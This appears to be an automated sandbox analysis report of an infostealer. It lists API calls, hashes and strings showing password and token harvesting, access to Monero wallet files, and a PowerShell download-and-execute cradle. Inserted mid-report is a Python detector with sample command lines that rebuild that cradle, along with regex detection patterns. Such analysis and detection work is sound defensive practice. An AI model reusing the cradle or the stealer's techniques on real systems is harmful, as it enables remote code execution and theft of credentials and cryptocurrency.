                                • Opcode Fuzzy Hash: eeecbfa1ad6ce0bc3e6a2ce0ce79fcc8621b33ca385e0dce6960fc7f4998a2d0
                                • Instruction Fuzzy Hash: 74314F72D00209DFCB19EBA4EE45EEE77B4BF48301B10512DF112B7284DA75AA87CB50
                                APIs
                                • memset.MSVCRT ref: 00EC7314
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00EC733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EC73B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EC740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00EC7452
                                • HeapFree.KERNEL32(00000000), ref: 00EC7459
                                • task.LIBCPMTD ref: 00EC7555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                • String ID: Password
                                • API String ID: 2808661185-3434357891
                                • Opcode ID: e4dd8114a8b2ed5b322c94adef7def945ef410009e41bcec2ab7ce961eed7ce7
                                • Instruction ID: 703c6d87661752b6833fd219ebc6f3ac215aeb7cb548615c18adbfcf05a515d4
                                • Opcode Fuzzy Hash: e4dd8114a8b2ed5b322c94adef7def945ef410009e41bcec2ab7ce961eed7ce7
                                • Instruction Fuzzy Hash: 87614CB590425C9BDB24DB50DE45FDAB7B8BF44300F0091E9E689B6141DBB15BCACF90
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,01B8DCE0,00000000,?,00EE0E2C,00000000,?,00000000), ref: 00ED8130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED8137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00ED8158
                                • __aulldiv.LIBCMT ref: 00ED8172
                                • __aulldiv.LIBCMT ref: 00ED8180
                                • wsprintfA.USER32 ref: 00ED81AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2774356765-3474575989
                                • Opcode ID: fc23ab20addbf9cd8aa6d8e7f0d344aa603a851581c787b85166d1f43d642901
                                • Instruction ID: b6ee2052684381bc1372dd8d7922b62df2d91b1374f92d0bbcddbae7d056d318
                                • Opcode Fuzzy Hash: fc23ab20addbf9cd8aa6d8e7f0d344aa603a851581c787b85166d1f43d642901
                                • Instruction Fuzzy Hash: CF215EB1E44318ABDB14DFD4DD49FAEB7B8FB44B00F10421AF615BB284D7B869018BA4
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EC4839
                                  • Part of subcall function 00EC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EC4849
                                • InternetOpenA.WININET(00EE0DF7,00000001,00000000,00000000,00000000), ref: 00EC610F
                                • StrCmpCA.SHLWAPI(?,01B8E220), ref: 00EC6147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00EC618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00EC61B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00EC61DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00EC620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00EC6249
                                • InternetCloseHandle.WININET(?), ref: 00EC6253
                                • InternetCloseHandle.WININET(00000000), ref: 00EC6260
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: 69b8f4bf2c7eff5b8abf871255a792c38eb20627094dc988185b4e1f3073f052
                                • Instruction ID: e0911f4c0bf2d9b16d8feea643ebae9d7aa14b3143bd26ce22822ad91371458d
                                • Opcode Fuzzy Hash: 69b8f4bf2c7eff5b8abf871255a792c38eb20627094dc988185b4e1f3073f052
                                • Instruction Fuzzy Hash: AB5180B1900218ABDB24DF50DD49FEE77B8EF44305F1090A9B605B72C0DBB66A86CF95
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                • lstrlen.KERNEL32(00000000), ref: 00ECBC9F
                                  • Part of subcall function 00ED8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00ED8E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 00ECBCCD
                                • lstrlen.KERNEL32(00000000), ref: 00ECBDA5
                                • lstrlen.KERNEL32(00000000), ref: 00ECBDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: cde22d5432183aff22937e3224ebf6cc563efd0e9db80606143d2d12e17f1a1e
                                • Instruction ID: de55d2ae355b58e6b2fd3ca424d84b5ce2cc7b0de73918fb832eeda85f847585
                                • Opcode Fuzzy Hash: cde22d5432183aff22937e3224ebf6cc563efd0e9db80606143d2d12e17f1a1e
                                • Instruction Fuzzy Hash: B7B154769102089BCB18EBA0DD96EEE73B8EF54300F44517AF50673191EF746B4ACB62
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: 8f4dea8746271e6dec0a11fab60ff8d6074e677e69c2eeb54fc87876b2b0f037
                                • Instruction ID: bdfce90d79280427a8357d8ed292d37a123c2af8bcea4a5137fdc926cfd00f09
                                • Opcode Fuzzy Hash: 8f4dea8746271e6dec0a11fab60ff8d6074e677e69c2eeb54fc87876b2b0f037
                                • Instruction Fuzzy Hash: 44F05E30D04309EFD3599FE0F50976C7B74FF04707F0441AAE61A97285D6B14B819B95
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00EC4FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EC4FD1
                                • InternetOpenA.WININET(00EE0DDF,00000000,00000000,00000000,00000000), ref: 00EC4FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00EC5011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00EC5041
                                • InternetCloseHandle.WININET(?), ref: 00EC50B9
                                • InternetCloseHandle.WININET(?), ref: 00EC50C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: bc9589ed17e965a66eb856f64e52fa909e89165ef71153fc1feb77a98f8d6ea3
                                • Instruction ID: fb4ed09fef97a481e2c80508122ae3fb4c4e317e578cf621577f23e36ae61f27
                                • Opcode Fuzzy Hash: bc9589ed17e965a66eb856f64e52fa909e89165ef71153fc1feb77a98f8d6ea3
                                • Instruction Fuzzy Hash: AD3109B5E0021CABDB24CF54DD85BDCB7B4EB48704F1081E9EA09B7285C7B16AC58F98
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00ED8426
                                • wsprintfA.USER32 ref: 00ED8459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00ED847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED8499
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                • RegQueryValueExA.ADVAPI32(00000000,01B8DDE8,00000000,000F003F,?,00000400), ref: 00ED84EC
                                • lstrlen.KERNEL32(?), ref: 00ED8501
                                • RegQueryValueExA.ADVAPI32(00000000,01B8DC68,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00EE0B34), ref: 00ED8599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED8608
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: d469150a885f5758535bb1f06ebff7204071d8f728ae56ab8ae1fcd2decb7cb5
                                • Instruction ID: 1f30b8280f0454ec13698318f5912a95f4cd84a8475a2a31fdf9e71a4e31c161
                                • Opcode Fuzzy Hash: d469150a885f5758535bb1f06ebff7204071d8f728ae56ab8ae1fcd2decb7cb5
                                • Instruction Fuzzy Hash: 8421D8719102189BDB28DB54DC85FE9B3B8FF48714F00C5A9A609A6240DF71AA86CF94
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED76A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED76AB
                                • RegOpenKeyExA.ADVAPI32(80000002,01B7B818,00000000,00020119,00000000), ref: 00ED76DD
                                • RegQueryValueExA.ADVAPI32(00000000,01B8DDB8,00000000,00000000,?,000000FF), ref: 00ED76FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED7708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 463a96727aade57d46f893fc228c4c546abb4c0d58907463fa9fee4c0c51fddb
                                • Instruction ID: e95e91f12d8f4b80f493a897c718a58cae7301bb071f8b5406e96513ebadd37b
                                • Opcode Fuzzy Hash: 463a96727aade57d46f893fc228c4c546abb4c0d58907463fa9fee4c0c51fddb
                                • Instruction Fuzzy Hash: 3E01A7B5E04308BBD715DBE0E849F6D77B8EF44701F008466FA55E7284E6B19A418B50
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED773B
                                • RegOpenKeyExA.ADVAPI32(80000002,01B7B818,00000000,00020119,00ED76B9), ref: 00ED775B
                                • RegQueryValueExA.ADVAPI32(00ED76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00ED777A
                                • RegCloseKey.ADVAPI32(00ED76B9), ref: 00ED7784
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: ab3af2797519bf53bdce18ad1d678cc985f17d04c0ec953636f3428ada1f4a63
                                • Instruction ID: 0f6a2d75102a596dbebcff11b4c1586a78c404b8229c287fed79e271bb69bf0c
                                • Opcode Fuzzy Hash: ab3af2797519bf53bdce18ad1d678cc985f17d04c0ec953636f3428ada1f4a63
                                • Instruction Fuzzy Hash: 2601A2B5E00308BFDB14DBE0EC4AFAEB7B8EF48701F004069FA15A7284DAB05A408B50
                                APIs
                                • CreateFileA.KERNEL32(:,80000000,00000003,00000000,00000003,00000080,00000000,?,00ED3AEE,?), ref: 00ED92FC
                                • GetFileSizeEx.KERNEL32(000000FF,:), ref: 00ED9319
                                • CloseHandle.KERNEL32(000000FF), ref: 00ED9327
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID: :$:
                                • API String ID: 1378416451-4250114551
                                • Opcode ID: 77c3470e8d95865ed2d1273b42ba8f402b942f714604464f4f0f141bfa4e0e62
                                • Instruction ID: 99b3ab7073d0ad9bd7a3480797bce46b3916cf0ec6737862596f18d87c9d5eef
                                • Opcode Fuzzy Hash: 77c3470e8d95865ed2d1273b42ba8f402b942f714604464f4f0f141bfa4e0e62
                                • Instruction Fuzzy Hash: 6DF04F35E40308BBDB28DFB0EC49F9E77B9EB48710F10C264B661B72C4D6B196418B40
                                APIs
                                • memset.MSVCRT ref: 00ED40D5
                                • RegOpenKeyExA.ADVAPI32(80000001,01B8D178,00000000,00020119,?), ref: 00ED40F4
                                • RegQueryValueExA.ADVAPI32(?,01B8DEC0,00000000,00000000,00000000,000000FF), ref: 00ED4118
                                • RegCloseKey.ADVAPI32(?), ref: 00ED4122
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4147
                                • lstrcat.KERNEL32(?,01B8DED8), ref: 00ED415B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValuememset
                                • String ID:
                                • API String ID: 2623679115-0
                                • Opcode ID: a046fdb63e412b8f0fbe5af9f619a59d11eb4fc045440a6fc354d0479dbc0340
                                • Instruction ID: 4653ba3682d7714859aa34de1a53eb740e2d19298504ee33e7183627950c4efd
                                • Opcode Fuzzy Hash: a046fdb63e412b8f0fbe5af9f619a59d11eb4fc045440a6fc354d0479dbc0340
                                • Instruction Fuzzy Hash: BA419CB6D0020867DB29EBB0EC46FEE737DAB48300F00455DB62557185EAB59BC98BD1
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                • LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                • CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: fbceede4ac0bdb590a548c82022359260f1ecd01f52aaab821974250b56f62ee
                                • Instruction ID: 1446f85f935beb32de28f18bf6ff20a7cae8799242e9a3f85809e8b564603437
                                • Opcode Fuzzy Hash: fbceede4ac0bdb590a548c82022359260f1ecd01f52aaab821974250b56f62ee
                                • Instruction Fuzzy Hash: BF312A74E00209EFDB24CF94D989FAE77B5FF48304F108158E911A7290D775AA82CFA0
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Similarity
                                • API ID: String___crt$Typememset
                                • String ID:
                                • API String ID: 3530896902-3916222277
                                • Opcode ID: 83f94fe93a0d7c39309451bf3af869439ea25b337a05c21a6666be0f3d6a079c
                                • Instruction ID: 11b5470fb903afb7653e5b11ed4185252c8e8553cd7635c96650bf05ff9893d4
                                • Opcode Fuzzy Hash: 83f94fe93a0d7c39309451bf3af869439ea25b337a05c21a6666be0f3d6a079c
                                • Instruction Fuzzy Hash: EB4159B110079C5EDB218B24CC94FFB7BE8DF45348F2454E9E58AA6282D2719A46DF60
                                APIs
                                • lstrcat.KERNEL32(?,01B8DE30), ref: 00ED47DB
                                  • Part of subcall function 00ED8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00ED8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4801
                                • lstrcat.KERNEL32(?,?), ref: 00ED4820
                                • lstrcat.KERNEL32(?,?), ref: 00ED4834
                                • lstrcat.KERNEL32(?,01B7B180), ref: 00ED4847
                                • lstrcat.KERNEL32(?,?), ref: 00ED485B
                                • lstrcat.KERNEL32(?,01B8D1B8), ref: 00ED486F
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00ED8D90: GetFileAttributesA.KERNEL32(00000000,?,00EC1B54,?,?,00EE564C,?,?,00EE0E1F), ref: 00ED8D9F
                                  • Part of subcall function 00ED4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00ED4580
                                  • Part of subcall function 00ED4570: RtlAllocateHeap.NTDLL(00000000), ref: 00ED4587
                                  • Part of subcall function 00ED4570: wsprintfA.USER32 ref: 00ED45A6
                                  • Part of subcall function 00ED4570: FindFirstFileA.KERNEL32(?,?), ref: 00ED45BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: ff8a8fae72074a3e8666bb188684ad795a7241183cb3d977d7c81218f52d11b2
                                • Instruction ID: 3199a661e540aa8da9a41e30de25da32e67157bb77bd990dbbbbe35ce61993b4
                                • Opcode Fuzzy Hash: ff8a8fae72074a3e8666bb188684ad795a7241183cb3d977d7c81218f52d11b2
                                • Instruction Fuzzy Hash: 3E3182B690031857CB25F7A0DC85EED73BCBB58300F40559AB359A6181EEB0D7CACB91
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00ED2D85
                                Strings
                                • ')", xrefs: 00ED2CB3
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00ED2CC4
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00ED2D04
                                • <, xrefs: 00ED2D39
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: 0eb79d3f6723788b916a3843c3e357e7edb96dfe720696aadbb291452554af70
                                • Instruction ID: 84b794e73488781468c7c111b019136475ef88fb40e4fed276abdbf3786c8887
                                • Opcode Fuzzy Hash: 0eb79d3f6723788b916a3843c3e357e7edb96dfe720696aadbb291452554af70
                                • Instruction Fuzzy Hash: 2841DC71C002489ADB18EBA0D895BEDB7B4EF10300F44512AE516B6291EF742B8BDF95
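The function above concatenates the three string fragments listed (the SysWOW64 powershell.exe path, `-nop -c "iex(New-Object Net.WebClient).DownloadString('`, and the closing `')"`) around a URL and launches the result with ShellExecuteEx, which is the behaviour behind the report's "Yara detected Powershell download and execute" signature. The detection helper below is an added example and is not part of the Joe Sandbox report or the sample's code. It runs over constructed process-creation records in Sysmon event 1 / Security 4688 shape: the first record's command line is rebuilt from the fragments on this page with a placeholder URL (the real URL is not on the page), the other two records, their parent images and the base64 `-enc` payload are invented for the test. It decodes `-EncodedCommand` arguments before matching, so the plain and encoded forms of the same cradle score the same.

```python
import base64
import re


def _encoded(cmd: str) -> str:
    """powershell.exe -EncodedCommand expects base64 over the UTF-16LE script text."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# Constructed process-creation records; not taken from the report.
# Record 0's CommandLine is assembled from the three string fragments the report lists for the
# ShellExecuteEx function; the URL is a placeholder because the real one is not on the page.
SAMPLE_EVENTS = [
    {
        "ParentImage": r"C:\Users\user\Desktop\file.exe",
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -c \"iex(New-Object Net.WebClient)"
                       ".DownloadString('http://example.invalid/stage2.ps1')\"",
    },
    {
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    },
    {
        "ParentImage": r"C:\Users\user\AppData\Local\Temp\dropper.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -w hidden -enc "
                       + _encoded("IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x')"),
    },
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; cover the usual spellings.
_ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
# Ways of pulling remote content into the process.
_CRADLE = re.compile(r"(?i)(?:downloadstring|downloadfile|downloaddata)\s*\(|invoke-webrequest|\biwr\b|"
                     r"invoke-restmethod|\birm\b|net\.webclient|start-bitstransfer")
# Ways of running a string as code.
_EXEC = re.compile(r"(?i)\biex\b|invoke-expression")
# Flags that suppress profile, window or prompts; common in droppers, not conclusive alone.
_QUIET = re.compile(r"(?i)(?:^|\s)-(?:nop|noprofile|w\s+hidden|windowstyle\s+hidden|noni|noninteractive)\b")
_URL = re.compile(r"(?i)https?://[^\s'\")]+")


def normalize_command(cmdline: str) -> str:
    """Return the text PowerShell will actually run: replace an -EncodedCommand blob with its
    UTF-16LE decoding so the same indicators apply to encoded and plain invocations."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not a real encoded command; score the raw line instead
    return cmdline[:m.start()] + " " + decoded


def analyze_event(event: dict) -> dict:
    """Score one process-creation record for the download-and-execute cradle."""
    script = normalize_command(event["CommandLine"])
    encoded = script != event["CommandLine"]
    cradle = bool(_CRADLE.search(script))
    execution = bool(_EXEC.search(script))
    quiet = bool(_QUIET.search(script))
    if cradle and execution:
        severity = "high"      # fetches remote code and runs it in memory
    elif cradle or encoded:
        severity = "medium"    # worth a look, not conclusive on its own
    else:
        severity = "low"
    return {
        "severity": severity,
        "encoded": encoded,
        "cradle": cradle,
        "execution": execution,
        "quiet_flags": quiet,
        "urls": _URL.findall(script),
        "parent": event.get("ParentImage", ""),
        "script": script,
    }


def scan(events: list) -> list:
    """Return only the records that warrant an alert, highest severity first."""
    order = {"high": 0, "medium": 1, "low": 2}
    hits = [analyze_event(e) for e in events]
    return sorted((h for h in hits if h["severity"] != "low"), key=lambda h: order[h["severity"]])


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["severity"], hit["parent"], hit["urls"])
```

The parent image is carried through for triage rather than scored: a cradle spawned from a user-writable path such as Desktop or Temp, as in the first and third records, is the case that matches this sample, but the same command line from a management agent still deserves the alert.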
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00EC9F41
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: 93928868f1223f6e304f471c784222154b2c263332997ac25147de153de83ca5
                                • Instruction ID: d1d682f5925d946e74a7e09ffedef7e3b557c061b3043178f54d8d3cca7b3c77
                                • Opcode Fuzzy Hash: 93928868f1223f6e304f471c784222154b2c263332997ac25147de153de83ca5
                                • Instruction Fuzzy Hash: 4C615D31A1024C9BDB28EFA4CD96FED77B5EF40344F049129F90A6B281EB706B46CB51
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • memset.MSVCRT ref: 00ED716A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Similarity
                                • API ID: lstrcpymemset
                                • String ID: s$s$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 4047604823-3520659465
                                • Opcode ID: 6a4e7c737c21ade7cb9c86056dabbf69a4b88ab28662c303b3adda59090390a9
                                • Instruction ID: 083bd19b3aa168bc2d7e780ee945dd5c1bd8c9ce5fcecd7118a18bda8d3e2b37
